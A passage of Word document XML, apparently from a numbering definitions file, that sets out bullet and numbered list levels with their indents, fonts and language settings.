        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AE14AFA6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6591" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="15B4FEB6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7534" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3B20862E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8477" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1F44FD06">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9420" w:hanging="281"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4BC46814"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2242A416"/>
    <w:lvl w:ilvl="0" w:tplc="5F5A8A14">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-3"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="823CA65C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1692" w:hanging="286"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9E907532">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2767" w:hanging="286"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9A3A3D32">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3834" w:hanging="286"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2FC26C00">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4902" w:hanging="286"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BBA8A1FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5969" w:hanging="286"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="025035E2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7036" w:hanging="286"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="70B8C9D4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8104" w:hanging="286"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7D5E1562">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9171" w:hanging="286"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="52D62EDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C20CCDDC"/>
    <w:lvl w:ilvl="0" w:tplc="1D165C8C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BCBC2E94">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2534" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="51FA4F46">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3509" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9B686F5E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4483" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="030E9C38">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5458" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7AC6A36C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EDAA2264">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7407" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C50251DE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8382" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3900270A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9357" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="53662895"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29A641DC"/>
    <w:lvl w:ilvl="0" w:tplc="1D744646">
      <w:start w:val="10"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="616" w:hanging="588"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7BEA3838">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1381" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4F56EB16">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2142" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="646CFBD6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2903" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FDF2CE86">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3664" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A1E2F3F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4426" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="994449EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5187" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9028F3FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5948" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5BFE9960">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6709" w:hanging="588"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="55EE5948"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0F8B8DE"/>
    <w:lvl w:ilvl="0" w:tplc="A4B683F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-10"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="11707C68">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2280" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-3"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0C20ABBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3282" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EB0EFE90">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4285" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7F320D78">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5288" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0032C196">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6291" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1A3CE48C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7294" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8110B768">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8297" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9ED4A600">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9300" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B535888"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B845DE0"/>
    <w:lvl w:ilvl="0" w:tplc="CD6A0A16">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-6"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4B8A553A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2534" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="19B6AEB6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3509" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2DD46372">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4483" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9E325F20">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5458" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C88425CC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="581ECD12">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7407" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E64461A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8382" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D0701478">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9357" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E591A8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E870A8E4"/>
    <w:lvl w:ilvl="0" w:tplc="C7941186">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C1709F20">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2534" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FC4EC178">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3509" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C9C4D7C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4483" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2D0A5D7E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5458" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4874FB9C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="58063972">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7407" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3B967D82">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8382" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="83C6DCD6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9357" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="76A027BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4505372"/>
    <w:lvl w:ilvl="0" w:tplc="C340E0DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2280" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:spacing w:val="-3"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CCA0989E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3000" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:spacing w:val="-1"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7AF213A2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3922" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="82068ED8">
